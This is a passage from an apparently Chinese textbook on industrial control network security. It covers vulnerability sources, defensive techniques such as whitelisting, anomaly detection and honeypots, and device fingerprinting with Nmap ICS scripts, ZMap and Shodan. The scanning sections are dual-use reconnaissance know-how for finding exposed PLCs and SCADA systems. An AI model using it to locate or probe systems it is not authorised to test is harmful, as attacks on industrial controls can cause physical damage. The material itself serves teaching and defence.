而网络上的计算机是被攻击和入侵的 主要对象。黑客经常利用计算机软件或配置上存在的脆弱性,进行无授权访问、特权提升、DDoS 攻击等。信息系统的网络安全本质上讲就是网络上的信息安全,攻击者的攻击目的一般是为了获取计算机上的信患资产。一旦攻击成功后, 被攻 击计算机一般遭受的是信患破坏, 严重一点是处于瘫痪状态。而工业控制网络中的组件有操作员站、工程师站、控制器、操作服务器、监控计算机、OPC 服务器、实时数据库和 PLC 等,这些控制组件一旦遭到网络攻击, 往往造成的是关键数据、 生产工艺与流程的破坏, 甚至会引起人员伤亡、设备损坏、环境污染等重大事故。同时, 这些组件所控制的系统资源重要程度是不一致的, 而工业控制网络中的攻 击往往具有很强的目的性, 攻击者的一般目的是攻击那些能够引起最大生产损失 的核心组件。同时, 攻击者在工业控制网络中的攻击发起点往往不是那些核心组件,他们需要利用工业控制网络中的脆弱性来找到所关心的攻击目标并展开攻击。 6.2.1 工业控制网络脆弱性主要来源 整体上来看, 工业控制网络脆弱性主要来自于安全策略与管理流程、工控平台和工业控制网络。具体而言,工业控制网络脆弱性主要来自于以下方面: 集成在 ICS 中的未打补丁的第三方应用程序; ICS 组件上未打补丁的操作系统; 不必要的服务造成的组件暴露; 不安全的 ICS 代码; 易于受到欺骗和中间人攻击的远程访问协议和工业通讯协议; ICS 通讯和数据传输中脆弱的服务器应用; 数据库脆弱性, Web 脆弱性; 认证绕过问题和证书管理; 未能保证 ICS 组件环境的安全; 不安全的网络设计,不良的防火墙规则; 未能保证网络设备的安全,无效的网络监控。 6.2.2 工业控制网络脆弱性分布 在工业控制网络中, 网络设备与协议、操作系统、工业控制软件以及其它运 行在工业控制网络组件上的脆弱性使得攻击者能够发起对工业控制网络进行信 息收集、破坏和操纵等攻击行为。从整体上而言, 工业控制网络脆弱性主要分布 在产品、组件和网络上。与产品中的脆弱性相比, 组件和网络中的脆弱性要少很 多,产品中存在着大量的脆弱性,大约占到整个工业控制网络脆弱性的 70%左右。 这一现象并不足为奇, 因为大多数的工业控制网络产品在设计和开发过程中 缺少安全规范, 工业控制网络协议和相关服务器应用都易受到中间人数据查看和 篡改。安全意识的缺乏导致了低质量代码, 网络协议的实现表现为脆弱的认证机 制和 Web 应用,由此会造成信息暴露和系统攻陷。工业控制网络产品通常采用 第三方的应用产品(如 Web 服务器、远程服务和加密服务)。很多过时的且脆弱 的第三方软件产品和服务被集成到新的 ICS 产品中。 ICS 产品、组件和网络上的脆弱性根据功能进行细分, 6.3 工业控制网络漏洞分析 除了认识工业控制网络信息安全问题的根源, 了解工业控制网络的漏洞会给 防御者带来优势。许多漏洞都源于应用程序或网络协议栈的软件缺陷, 而其他漏洞则源于薄弱的安全策略、糟糕的网络设计和其因素。 6.3.1 工业控制网络漏洞种类 NIST SP 800-82 中列举了常见的工业控制网络漏洞, 该漏洞列表的范围较广, 包括不充足的安全策略导致的程序漏洞(如缺乏培训、安全意识和规范化的安全 过程等)、平台配置漏洞(即未打补丁的系统、使用默认配置和弱口令等)、软件 漏洞(固有的缺陷, 如缓冲区溢出; 脆弱的协议或服务, 如 DCOM 等)、缺乏足 够的恶意软件、网络配置不当(薄弱的网络安全控制、未加密、无访问控制、无冗余设计等)、低级的网络认证和边界防护、无完整性检测。 6.3.2 工业控制网络漏洞态势 工控网络已经成为信息安全人员关注的新焦点, 一些恶意的攻击者不断扫描 工控系统的漏洞, 并使用针对工控系统的专用黑客工具发动网络攻击。今年来漏 洞数量呈爆发式增长的趋势, 主流的工业控制系统也普遍存在安全漏洞, 且多为 能够造成远程攻击、越权执行的严重威胁类漏洞。此外, 工业控制网络通信协议 种类繁多、系统软件难以及时升级、设备使用周期长,以及系统补丁兼容性差、 发布周期长等现实问题, 造成了工业控制系统的补丁管理困难, 难以及时处理严重威胁的漏洞。因此,及早发现工控系统中的漏洞是保护工业控制系统的关键。 2015 年, 随着“互联网+ ”、“中国制造 2025”等国家战略方针的出台, 国内 工业控制系统的网络化、智能化水平快速提高,但国内工控系统安全问题突出, 系统网络普遍脆弱,整体安全形式面临严峻挑战。截至 2015 年年底,根据中国 国家信息安全漏洞共享平台所发布的 2015 年新增漏洞信息,共整理出新增的工 业控制网络相关的漏洞 108 个。 造成这一趋势的原因如下: 一方面,工控系统的主要厂商意识到其产品在安全方面的脆弱性并加强自身产品的安全性设计和开发,是漏洞挖掘的难度增加。 另一方面, 由于政治、军事等因素的影响, 作为国家基础设计建设的工控系统已经成为信息战场的必争之地, 导致部分漏洞信息可能被限制公开或转为地下 交易。从美国 ICS-CERT 每年发布的安全事件数量可以佐证这一推论, 如图 6.3 所 示。虽然每年公开的新增漏洞数量在下降, 但工控安全事件数量却呈明显的上升趋势。 目前, 工控安全厂商和国家安全组织仍在不遗余力第收集、挖掘工控安全漏 洞信息, 并寻求解决方案, 以帮助工控企业提高系统安全防护能力, 抬高攻击者门槛和攻击成本。 第七章 工业控制网络安全防护技术 工业领域的安全通常可分为物理安全(PhysicalSafty)、功能安全(Functional Safty)和信息安全(Security)三类。 物理安全是减少由于电击、着火、辐射、机械危险、化学危险等因素造成的 危害。 功能安全是为了实现设备和工厂安全功能, 受保护的安全相关部分和控制设 备的安全相关部分必须正确执行其功能。当失效或者故障发生时, 设备或系统必 须仍能保持安全条件或进入安全状态。 信息安全的范围较广, 大到国家军事政治等机密安全, 小到防范企业机密的 泄露、个人信息的泄漏等。在 ISO/IEC 27002 中,信息安全的定义是“保持信息 的保密性、完整性、可用性, 另外也可包括真实性、可核查性、不可否认性和可 靠性等。” 工业控制网络安全防护的核心是建立以安全管理为中心, 附以符合工控网络 特殊性的安全技术, 进行有目的、有针对性的防御。本章将首先介绍工业控制网 络安全的含义, 然后针对已知安全威胁和未知安全威胁的处理方法, 分别阐述如 何实现工业控制网络的基础软硬件安全、设备与主机安全、行为安全和结构安全。 7.1 工业控制网络安全的内涵和外延 工业控制网络安全是工业领域安全的一个分支, 是近年来学术界和产业界共 同关注的热点。工业控制网络安全与传统的信息网络安全有一定的共性, 在很多方面都存下交集,但也存在许多显著区别,取决于工业控制网络的架构。工业控制网络的安全是针对工控网络中的设施和信息保护而言的, 涉及一下三个方面的基本需求。 可用性 工业控制网络安全必须确保所有必须确保工业控制系统中的各个部件可用,运行正常以及功能正常。工业控制系统的工作过程是连续的, 不能接受意外中断, 如果需要人为中断,必须提前计划和安排, 即使如此, 在具体实施前开展测试也是必须的, 以确保工业控制系统的高可用性。针对意外中断, 许多工业控制系统为了保证生产的连续 性, 不允许随意启动和停止设备。在某些情况下, 生产的产品或者使用的设备比 信息中断增加重要。因此, 如果简单采用典型信息网络的安全策略, 如重新启动 某个组件, 通常在工业控制网络安全中是无法接受的, 将会对工业控制系统的可 用性、可靠性和可维护性产生不利影响。在某些工业控制系统中包含许多冗余部 件, 它们并行运行, 在主部件出现故障后可以切换到备份部件, 从而提高系统的工作连续性。 完整性 工业控制网络安全必须确保工业控制系统中的各种信息的完整性和一致性。 主要涵盖一下两个方面:数据完整性,即数据未被篡改或者破坏;系统完整性,即系统未被非法操作,按既定的目标运行。 保密性 工业控制网络安全必须确保对工业控制系统中各个部件和信息的授权访问,防止系统中盗用和盗取事件的发生。和传统信息网络相比, 工业控制网络对上述三个需求的优先级存在明显区别 7.2 已知安全威胁的防护技术 本节将介绍针对关键基础设施安全基准来解决安全架构的设计针对已知威胁的防御技术。 7.2.1 结构安全 结构安全性即基础设施建设过程中网络拓扑结构、以及区域、层次的划分是 否满足安全需求。通过隔离、过滤、认证、加密等技术, 实现合理的安全区域划 分、安全层级划分, 实现纵深防御能力。对于新装系统, 应实现结构安全同步建设;对于再装系统, 应进行结构安全改造; 对于因条件限制无法进行改造的系统,应建立安全补偿机制。所以结构安全最为重要, 结构安全解决了大部分安全问题。结构安全可以从两个部分考虑, 分别为网络结构的优化与防护技术和设备的部署。 结构优化 结构主要指的是网络的结构, 但是也包括生产的布局结构。它与入侵容忍度 是紧密相关的。当安全事件发生的时候, 必须有相应的结构, 这样才能保证工业 控制系统中的其他部分不受影响。本质上这就是“分区隔离”的概念, 它会将危 害限制在一个尽量小的可控范围之内, 如国家电网采用的“横向隔离、纵向认证”策略。结构安全中所谓的隔离并不一定是物理隔离, 因为工业控制系统中很多部分 需要互联, 甚至是互联网的接入, 因此引入了访问控制技术。新装系统的结构安 全性问题和在装系统的结构安全性改造问题大多数时候就是将部分行为安全中 安全管理的内容条理化,转变为结构安全问题。但是结构安全在最新的应用场景下也暴露出了新的问题, 这就是无线网络的 应用。例如, 传输线路采用光纤和无线互为备份, 因为无线是开放的, 所以就带 来了结构安全性问题。如果此时想要保证结构安全性,既可以对网络进行调整, 也可以增加新的技术、设备措施。 访问控制 结构安全的根本所在就是通过控制如何访问目标资源来防范资源泄露或未 经授权的修改。访问控制的实现手段在本质上都处于技术性、物理性或行政管理 性的层面。基于策略的文档、软件和技术、网络设计和物理安全组件都需要实施 这些控制方法。工业控制网络的接口处是最应该实施安全控制的一个地方, 毕竟这是通向关键资产的入口,需要层层防御来实施访问控制。访问控制本身是一种安全手段, 他控制用户和系统如何与其他系统和资源进行通信和交互。访问控制能够保护系统和资源免受未经授权的访问, 并在身份认证过程成功结束后确定授权访问的等级,在访问控制环境中,正确理解主体和客体的概念是非常重要的。 访问是在主体和客体之间进行的信息流动。主体是一个主动的实体, 它请求 对客体或者客体内的数据进行访问, 主体可以是通过访问客体以完成某种任务的 用户、程序或进程。当程序访问文件时, 程序是主体, 而文件是客体。客体是包 含被访问信息或者所需功能的被动实体。在工业控制网络中, 客体可以是某个系 统、 PLC、传感器、计算机、数据库、文件、 应用程序、目录或数据库中某个表内包含的字段。访问控制包含的范围很广, 它涵盖了几种对计算机系统、网络和信息资源进 行访问控制的不同机制。因为访问控制是防范计算机系统和资源被未授权访问的 第一道防线, 所以地位非常重要。用户的访问权限主要基于其身份、许可等级和 组成员资格。访问控制给予组织机构控制、限制、监控以及保护资源可用性、完整性和机密性的能力。 防火墙技术 防火墙用于限制从另一个网对特定网络的访问。防火墙设备支持和实施企业 的网络安全访问策略。有组织的安全访问策略可以提供高层次、可接受和不可接 受的操作的提示, 从而维持整体的边界安全性, 所以防火墙技术本身也是结构安 全层面最为重要的安全技术手段, 是实现结构安全的基础。防火墙具有定义更详 细和更细粒度的安全策略的能力, 从而规范工业控制网络中哪些地址、哪些端口、 哪些服务或者协议允许或者被禁止访问哪些区域。一般情况下, 防火墙提供以下四种主要服务: 1) 服务控制:确定可以访问的网络服务; 2) 方向控制:决定在哪个方向上的服务请求可以被发起并通过防火墙; 3) 用户控制:内部用户、外部用户所需的某种形式的认证机制; 4) 行为控制:控制一个具体的服务怎样被实现。 防火墙的实现形式包括搭载防火墙软件产品的服务器或者其他特殊硬件设 备, 防火墙会将经过它的数据包进行分析过滤, 可能丢弃、重新打包、重定向或 者直接放行。通常在工业控制网络结构优化设计阶段, 会使用防火墙在工业企业 内部不同安全级别和业务需求的区域之间部署防火墙产品和策略, 实现彼此之间互相访问资源的时候可以有严格的安全策略进行过滤和控制。 7.2.2 设备与主机安全 设备与主机安全即工控环境中各种设备自身的安全性。例如, 智能设备在基 础设施建设中广泛使用, 包括感知设备、网络设备、监控设备等, 这些设备普遍 存在漏洞、后门等安全隐患。保证工业控制系统中的设备与主机的安全性赢首先 具备标准化的监测工具, 这些智能设备在出厂时需要做充分监测从而保证设备的 离线安全、在项目建设过程中进行入网安全监测、在项目运行过程中进行实时的在线监测,从而全方位保证设备的自身安全性。设备与主机的安全很重要的一点就是设备本身的安全性。大量工控厂商会混 淆稳定性和安全性的概念,例如双备份系统, 一定程度上增强了系统的稳定性, 但如果两个系统都存在同样的安全缺陷, 双备份系统并不会增强安全性。对于实际使用这些系统的工业企业而言,也很难发现和解决这些安全缺陷。 漏洞发现与补丁 工业企业自身即使发现漏洞并打好补丁的可能性比较小, 而且还存在一个时 间窗口。而工业控制设备厂商的版本发布周期长达一年甚至更长, 发现问题后一 般无法即使修改代码。因此, 信息网络中普遍使用的打补丁方法, 在先天缺乏安 全基因的工业控制领域显然难以适用。因此就必须依赖漏洞扫描和漏洞挖掘技术系统漏洞,它们是系统管理员保障工业控制系统安全的有效工具。漏洞扫描技术的对象包括工业网络控制设备、工业网络工控系统、工业网络 安全设备和工业网络传输设备等。进行漏洞扫描时, 首先探测目标的存活性, 然 后对存活设备进行端口和协议扫描, 确定目标开发的端口和运行协议, 同时根据协议指纹识别技术判别目标的系统类型和版本, 最后根据上述信息, 调用漏洞资 料库中的各种漏洞注意进行检测, 通过对响应数据包的分析判断目标对象是否存 在漏洞。漏洞扫描技术主要针对已知漏洞, 而漏洞挖掘技术则侧重发现工业控制 系统中未知的安全威胁。现阶段, 安全研究人员对于工业控制设备的内部结构了 解不足, 对工业控制设备的逆向技术处于起步阶段, 又很难获得工业控制系统的 源代码和目标文件, 无法采用白盒和灰盒测试方法, 因此采用模糊测试来挖掘工 业控制设备漏洞的方法较为常见。 补偿性措施 当某个特定数据包会导致工业控制系统崩溃或者引发进一步的安全问题时, 保护设备可以拦截该数据包, 这样就不用修改工业控制系统代码或者安装补丁了。类似此类保护设备实现的功能称之为补偿性措施。保护设备放置在需要保护的工业控制设备或者系统的前端。如果用户已知某 个漏洞风险很大, 一定导致某些危害, 并且已经曾经发生过, 那么这样的补偿性 措施对用户而言就尤为必要, 并且这类补偿性措施的升级比工业控制系统本身的升级和打补丁的风险要低得多。此外,设备与主机的安全性问题也可能被意外触发(非恶意攻击)。例如, 不同厂商的工业控制设备部署在同一系统中, 可能存在相互干扰, 即使非恶意使 用也会导致恶意结果。对于工业企业而言, 有效管理这部分威胁对于提高设备和主机的安全性也非常重要。 7.2.3 行为安全 行为安全包括两部分, 即系统内部发起的行为是否具有安全隐患, 系统外部 发起的行为是否具有安全威胁。行为安全性防护首先应具备感知能力, 在云端通 过大数据分析感知威胁和安全态势, 通过本地端通过靶场、蜜罐、审计、溯源等 技术, 对网络流量、文件传输、访问记录等进行综合分析与数据挖掘, 实现对已 知威胁和未知威胁的感知, 以及对全局和局部安全态势的感知, 并与其它安全技 术联动,对不安全行为及时进行处理。除了行为分析技术外, 在工业控制网络中, 行为安全的管理技术也非常重要。行为安全管理不仅针对恶意的, 也包括非恶意 的, 例如操作员错误发出一个指令, 可能导致整个系统停机。此外行为安全管理还包括许多日常管理,如 USB 设备管理、定期操作审查等。改善系统中行为安全的最常见的技术为入侵检测技术。它是对入侵行为的发 觉,通过从网络或特定系统的关键点收集信息并进行分析, 从中发现网络或系统 中是否有违反安全策略的行为和被攻击的迹象。入侵检测软件和硬件的组合便是 入侵检测系统, 其对系统的运行状态进行监视, 发现各种攻击企图、攻击行为或者攻击结果,以保证系统资源的机密性、完整性和可用性。 7.2.4 基础软硬件安全 基础软硬件安全性即工业控制系统使用的 CPU、存储器、操作系统内核、基 本安全算法与协议以及各种其他核心软硬件的完全可信、自主可控。有条件的工 业企业, 应实现对自有系统与设备的基础软硬的安全性改造, 以及对进口系统与 设备的基础性软硬件安全性加固。不具备条件的工业企业, 也应增加安全补偿机制。基础软硬件安全的概念非常宽泛, 它的核心概念在于免疫性安全, 即设备自 身具有排除破坏、攻击、篡改的能力。基础软硬件安全技术中相对具有代表性的是可信网络和可信计算。可信网络架构不是一个具体的安全产品或一套针对性的安全解决体系, 而是 一个有机的网络安全全方位的架构体系化解决方案, 它强调实现各厂商的安全产 品横向关联和纵向管理。可信网络的一般性架构主要包括可信安全管理系统、网 关可信代理、网络可信代理和端点可信代理四个部分,从而确保安全管理系统、 安全产品、网络设备和端点用户 4 个安全环节的安全性与可信性。它旨在实现用 户网络资源的有效整合、管理与监管, 实现用户网络的可信扩展以及完善的信息安全保护;解决用户的现实需求,达到有效提升用户网络安全防御能力的目的。可信计算是一项由可信计算组织推动和开发的技术。该技术的拥护者称它将 会使计算机更加安全, 更加不易被病毒和恶意软件侵害, 因此从最终用户角度来 看也更加可靠。而反对者则认为可信计算背后的那些公司并不那么值得信任, 这 项技术给系统和软件的设计者过多的控制权和控制。从广义的角度, 可信计算旨 在为网络用户提供一个更为宽广的安全环境, 它从安全体系的角度来描述安全问题,确保用户的安全执行环境,突破被动防御打补丁的方式。 7.3 未知安全威胁的防护技术 防火墙、 IDS 和防病毒等技术措施都是针对已知安全威胁,本节将讨论如何发现和防御工业控制网络中新型的、未知的安全威胁。 7.3.1 纵深防御技术 按照传统的纵深防御技术针对工业控制网络的结构进行全面部署之后, 至少 应该具备类似传统信息网络中防火墙、入侵检测系统、入侵防御系统、防病毒和 应用程序监控等安全设备的能力。纵深防御技术除了可以解决结构安全和提供对已知威胁的防御能力之外, 如果应用巧妙也可以发现和防御很多未知威胁的攻击。防火墙和 IDS 设备的特定策略都可以用来评估各种行为, 匹配策略的不同条 件对应的不同行为可以区分所有数据的情况, 虽然防护的结果是“是非判断”的 结论,但是通过分析大量看似安全的行为和事件同样可以发现可疑的潜在威胁。 使用数据挖掘的方法分析数据和日志信息, 将它们建立相互关联, 就能够覆盖防 护区域内的通信状态、用户访问、运行状态和控制管理等。例如, 在工业控制网络内部通信的源地址不可能出现无法识别的非内网网段地址。 7.3.2 异常行为检测 有时即使一个非威胁行为也可能违背预设的安全策略, 通过与已知的正常参 数进行比较和分析就可以了解到这些异常事件的具体原因。这种比较可以采用人 工方式也可以使用程序自动化分析处理, 其最大的意义在于实际的业务运转过程 中必然会有大量的数据或者事件产生,其中一部分可能是没有意义“脏数据”, 但还有可能是目前未知的新的攻击方法产生的数据, 后者是攻击者为实施某一攻击目的所做的铺垫行为。发现这些异常的情况并分析出潜在的恶性后果是异常行为检测的最终目的, 为了实现这些目的必须首先定义一些固定的衡量标准和算法, 这些衡量标准被称 为衡量参量。参量就包括正常参量和异常参量, 这是进一步进行异常行为检测和分析的基础。通过一个或者多个参量可以将某个异常行为完全确定下来。异常参量作为异常行为检测的最小分析单元, 需要通过一个特定的衡量标准进行制定, 在不同行业的工业控制系统中可能有较大差别。但是因为所有的正常 和异常行为特性都必然在同一个时空轴中进行, 所以不同行业中众多的异常参量 中会有一个共有的固定参量, 即时间参量。每一参量都是基于固定时间的运行平 均值, 这个特性为现有业务行为之间的比较提供了基础。异常参量不仅在比较过 去和现在的行为方面行之有效, 在衡量工控控制系统中的程序处理能力、业务指标等方面也非常有效。通过分析参量的过去情况可以预测未来行为的延续性趋势。通过对比异常参量可以发现偏离正常范围的一些异常情况, 但是单一的异常 参量并不一定可以确定一个异常事件或是威胁。那么, 对于有些具有时间规律的 业务就可以引入时间参数取解决这个问题, 生产一个非线性基线图作为参量。例 如,为管理员一周时间内登录系统的次数绘制基线图, 那么可能周一的频次会较 多, 而周末则偏少。时间相关的基准是非常有用的, 因为大量的业务规律都随着 时间变化呈现一定的规律性。针对不同的业务场景和系统情况, 可能 1 小时为一 个周期、 1 天为一个周期,甚至 1 个月、 1 个季度为一个周期。每个工业控制系 统都可能有数百个这种基于不同时间规律的基线。通过对这些基线的异常参量,就可以发现一些可疑的异常行为。由于无需依赖检测标志, 异常行为检测是一种非常实用的未知威胁检测技术。 相比于一般的信息系统, 工业控制系统中的业务的规律性和稳定性更强, 通过时间参量进行建模之后,随着时间推移能够检测分析出大多数场景中的异常行为。 7.3.3 白名单技术 结构安全中使用的访问控制功能本质上就是白名单技术的应用, 人工培植的 每一条访问控制安全策略就是每一个访问路径的白名单规则。白名单的防御技术 是一种与黑名单思路截然相反的安全防御方式, 它本身不需要分析和检测未知威 胁, 只需要关心哪些不是威胁即可达到安全防护的效果。常见的白名单技术有以下几类。 应用程序白名单 应用程序白名单是用来防止未认证的应用程序运行的一种措施, 只有规则允 许的应用程序才能被运行。在特定的工业应用场景下, 需要针对场景中为了实现业务系统的正常运转所需使用的所有软件和应用程序进行统计, 然后对其进行充分的代码审计、安全测试和分析,结合完整性检查方法的应用, 一般为散列法,确保该应用程序是已经认证安全通过的。 用户白名单 为了发现一些潜在威胁, 针对一般用户活动和管理员行为的分析是非常必要 的。大量的渗透攻击都是通过拿到一定权限的用户或管理员账号后实施下一步恶 意行为的。用户白名单的技术措施独立于系统自身的用户管理措施, 但不同于结 构安全中的基本访问控制功能, 其自身还针对用户所拥有的权限进行白名单管理,实现了部分审计功能的自动化。 资产白名单 许多针对工业控制系统的攻击和误伤行为, 都是由于在工业控制网中非法接 入了其他设备造成的。可以借助成熟的自动化网络扫描工具, 快速获得工业控制 网络中的资产清单。结构安全中基于边界的各种安全策略通过白名单技术可以落 实到每一个设备上。一旦恶意设备或地址接入到工业控制系统中, 基于资产白名单技术,通过结构安全方法仍然能快速检测到该威胁源。 行为白名单 同资产白名单一样, 应用程序的每一个行为都可以被记录为白名单, 并且行 为白名单也需要先进行明确的定义, 从而将应用程序的正常业务行为和其他恶意 或无关行为区分开。相比于应用程序白名单和资产白名单, 行为白名单要以更细粒度、更加贴合业务的方式定义和实现。 7.3.4 关联分析技术 智能列表 智能列表的概念在“2010 欧洲 SCADA 与过程控制峰会”上首次提出,它将 智能分析引入到白名单的概念中, 从而相结合催生出智能列表概念。通常黑名单 技术阻断恶意行为, 白名单技术只允许合法的行为, 而智能列表则基于白名单和 时间轴线, 动态定义黑名单的内容。智能列表本质上是一种基于多种白名单技术 和关联比对能力, 可以动态调整黑名单安全机制的新型控制方式。这种方式可以在新出现的威胁爆发的时候,第一时间对其进行发现和识别。 事件关联 事件关联是利用大量离散的事件数据并将其作为一个整体, 结合时间和实际 的场景等客观因素进行综合分析, 找到需要立即引起注意的重要模式和事故, 从 而提高威胁监测方法和手段的能力, 发现一些隐藏在正常时间数据背后的异常事 件。从某种意义上而言, 事件关联的灵感其实多来自于人工分析安全问题的方式, 目前事件关联技术的发展程度虽然还没有达到可以完全替代人工的程度, 但是已经可以给人工的安全评估工作提供许多便利,解决一些人工难以处理的问题。 7.3.5 蜜罐技术 蜜罐是一种引诱攻击者, 主动吸引扫描、攻击流量, 并监视、检测和分析攻 击的技术。蜜罐的价值在于可以捕获、发现新的攻击手段及攻击方法, 是针对未 知威胁最有效的发现工具。由于蜜罐技术的目的性强, 捕获的数据价值高, 误报 和漏报的情况极少, 对于大多数应用场景都适用。典型的工业控制系统蜜罐为模拟某种工业控制设备, 并将它与互联网相连或者与本地真实的工业控制网络相连。蜜罐技术的核心主要有三个部分: 数据捕获技术、数据控制技术以及数据分 析技术。蜜罐根据系统功能的区别可以分为产品型蜜罐和研究型蜜罐; 根据交互程度的区别可以分为低交互蜜罐和高交互蜜罐。蜜罐技术具有误报率和漏报率低的优势, 拉近了攻防双方的距离, 使得安全 防护的一方不再完全被动。入侵检测、防火墙、认证加密等技术都存在缺陷性,它们与蜜罐技术紧密结合,将成为未知威胁检测最有利的武器。 第三部分:数据驱动的工业控制网络安全 第八章 工业控制设备扫描识别 无论是网络系统安全性评估还是黑客发起网络攻击, 网络扫描都是不可或缺 的重要手段。通过网络扫描能够发现网络中各种设备开放的端口、服务、硬件型号、软件版本,甚至内存中的数值以及这些服务存在的安全漏洞。 8.1 工控设备扫描识别技术 8.1.1 工控设备扫描识别技术介绍 工控设备扫描识别是利用不同信息描述运行于网络中的工业控制设备或者 软件的一种技术。我们了解最多的是工控设备指纹, 被用来远程识别工控设备的硬件,操作系统,运行软件(及其相关的版本号,配置参数)等信息。指纹提取方法主要分为两类: 主动式(active)和被动式(passive)。主动式 指纹提取要求工具去主动扫描网络系统获取信息, 被动式指纹提取方法则是通过 尽可能少的网络侵扰(less intrusive),被动式的监听网络获取信息。通常, 主动 式指纹识别成功识别系统的概率更大些。这是因为主动式识别意味着收集所有生 成 fingerprint 所需要的信息, 而被动式识别只能收集会话通道信息。但主动式识 别并不是任何时候都能够起作用, 探测扫描更易造成网络繁忙, 且易被检测。例 如,在 SCADA 系统中,主动式扫描可能造成系统过载。主动调试会使设备处理 的 frame 数量增长, PLCs 和 RTUs 无法支持超出的流量,从而导致正常请求无法响应。而被动式监听网络由于收集信息复杂则存在指纹准确性问题。指纹识别技术应用于 ICS 领域的过程中, 在相对传统网络有可利用的优势同 时也伴随着挑战。 ICS 系统组件相对于常规互联网和公司局域网有着其固有的特 性和缺陷。 一方面,相较于传统 IT 系统, ICS 系统中工控设备具有长生命周期, 稳定的网络拓扑和会话; 另一方面, 信息采集方式面临着主动式或是被动式方法 选择问题, 设备多样化, 长时间 TCP 会话连接等问题。设备供应商协议定制则是 一把双刃剑,协议允许检测者对 ICS 系统进行定位(公开协议) 或者识别特定设备(私有协议),而相对私有协议做报文分析因无文档而显得很困难。在 ICS 环境中,我们总是更倾向于只使用被动式监控,最小化潜在的风险。目前已有些比较成熟的被动式识别工具(如 ettercap, p0f, Satori and NetworkMiner),它们基于 TCP/IP 协议栈监听分析网络。但研究者们更倾向于采用透明的,无深度包检查的方式来识别 ICS 网络行为。 8.1.2 工控设备扫描识别工具 Nmap (网络映射器) 是一个开源工具, 它使网络探测和安全审计得以专业 化。最初由 Gordon “Fyodor ” Lyon 发布。官网官方网站是 http://nmap.org。 Nmap 采用一种新颖的方式利用原始 IP 包来决定网络上是什么样的主机, 这些主 机提供什么样的服务(应用程序名和版本),它们运行着什么样的操作系统(操 作系统版本)它们使用什么类型的过滤器/防火墙以及许多其他的特征。它虽然 被设计用来快速扫描大型网络, 但是在单个主机上也会工作的非常好。 Nmap 可 以运行在所有的主流计算机操作系统上, Linux,Windows,Mac OS X 都可以找到 官方的安装包。 Nmap 脚本引擎 (NSE) 是 Nmap 最有力灵活的的一个特性, 它允许用户撰写和分享一些简单的脚本来一些较大的网络进行扫描任务, 这些脚 本是用 Lua 编程语言来完成的。 Nmap 脚本库中包含一些工业设备发现的脚本, 如 s7-info.nse 、modbus-discover.nse 等,我们可以利用这些脚本进行工控设备探测识别,也可以根据工业协议自己开发脚本进行探测。 Zmap 是美国密歇根大学研究者开发出一款工具。在第 22 届 USENIX 安全研 讨会, 以超过 nmap 1300 倍的扫描速度声名鹊起。相比大名鼎鼎的 nmap 全网扫 描速度是他最大的亮点。在千兆网卡状态下, 45 分钟内扫描全网络 IPv4 地址。 ZMap 则是一种“无状态”的工具;也就是说,这种工具会向服务器发出请求, 然后就“忘记”这些请求。 ZMap 不会保留未获回复请求的清单,而是在传出的 数据包中对识别信息进行编码, 这样一来该工具就能对回复进行鉴别。这种方法 拥有巨大的优势,意味着 Zmap 输出数据包的速度比 Nmap 高出 1000 倍以上。因此, 用 Nmap 对整个互联网进行扫描需要花费几个星期时间, 而使用 ZMap 这种工具则只需要 44 分钟。在拥有这种工具以后, 人们将可迅速扫描整个互联网, 而且费用也不高, 这就为针对整个互联网的研究工作开辟了一些令人深深着迷的 新可能性。Zmap 项目组也发布了开源的工控设备探测组件 Zgrab,我们可以利用该组件结合 Zmap 进行工控设备高效探测。 8.1.3 工控设备扫描识别技术应用场景 网络空间搜索: Shodan 是目前最流行的网络空间搜索引擎, 它扫描 HTTP, FTP, SSH, Telnet, SNMP and SIP 等协议, 通过分析客户端与服务端交互过程中的信息, 识别全网设备。目前较流行的威胁感知系统也是利用 fingerprint devices 技术探测网络空间设备。资产管理: 现实中, 系统管理员很少了解资产的全部信息, 或者了解到的是 错误信息。导致这种现状出现可能是因为信息未能及时更新, 或者是系统维护交 由外包管理,或者是设备供应商提供了错误的配置信息。因此, ICS 系统有必要 提供信息保证高效的现场检查(site-inspection),系统管理员能够准确的了解系统的相关配置信息。入侵检测: 攻击者理论上可以通过注入命令或者假数据来侵扰 ICS 网络, 如 造成大面积停电等灾难性后果。一些设备由于老旧无法升级, 甚者一些设备供应商不提供线上升级打补丁。安全工作人员能够及早的发现入侵行为显得尤为重要。 8.2 网络空间搜索引擎 Google 、baidu 、bing 等搜索引擎已经索引了整个虚拟世界,然而它们尚未 成功地将自己的触角延伸到现实世界当中。区别于传统的基于内容的搜索引擎,网络空间搜索引擎是面向物联网的崭新的搜索引擎, 它搜索的不是与某个字段相关联的内容, 而是每时每刻都在寻找着所有和互联网关联的物理设备, 包括服务 器、摄像头、打印机、路由器、工业控制设备等等,从而有效的索引现实世界。著名的网络空间搜索引擎有 Shodan 、censys 和 Zoomeye。 8.2.1 Shodan 2004 年, John Matherly 在大学期间开发了世界上首个网络空间搜索引擎 Shodan,虽然目前人们都认为谷歌是最强劲的搜索引擎,但 Shodan 才是互联网 上最可怕的搜索引擎。与谷歌不同的是, Shodan 不是在网上搜索网址,而是直 接进入互联网的背后通道。 Shodan 可以说是一款“黑暗”谷歌, 一刻不停的在 寻找着所有和互联网关联的服务器、摄像头、打印机、路由器等等。每个月 Shodan都会在大约 5 亿个服务器上日夜不停地搜集信息。Shodan 所搜集到的信息是极其惊人的。凡是链接到互联网的红绿灯、安全 摄像头、家庭自动化设备以及加热系统等等都会被轻易的搜索到。 Shodan 的使 用者曾发现过一个水上公园的控制系统, 一个加油站, 甚至一个酒店的葡萄酒冷 却器。而网站的研究者也曾使用 Shodan 定位到了核电站的指挥和控制系统及一个粒子回旋加速器。 由于 2008 年开始, 美国土安全部(DHS)利用 Shodan 展开 SHINE 计划, 使 得 Shodan 具备了深刻的政府背景。Shodan 上能找到的设备包括但不限于服务器、 路由器、交换机、公共 IP 地址的打印机、网络摄像头、加油站的泵、VOIP 电话、SCADA 系统等等。使用 Shodan 需要注册账号,搜索服务免费,但并不能查看所有搜索结果。 目前 Shodan 支持免费查看 20 条搜索结果, 查看其他的或者批量导出结果需要付费。在主页的搜索框中输入想要搜索的内容即可,例如搜索 “PLC”:显示的搜索结果包含两个部分,左侧是大量的汇总数据包括: Results map – 搜索结果展示地图 Top services (Ports) – 使用最多的服务/端口 Top organizations (ISPs) – 使用最多的组织/ISP Top operating systems – 使用最多的操作系统 Top products (Software name) – 使用最多的产品/软件名称 随后,在中间的主页面我们可以看到包含如下的搜索结果: IP 地址 主机名 该条目的收录收录时间 该主机位于的国家 Banner 信息 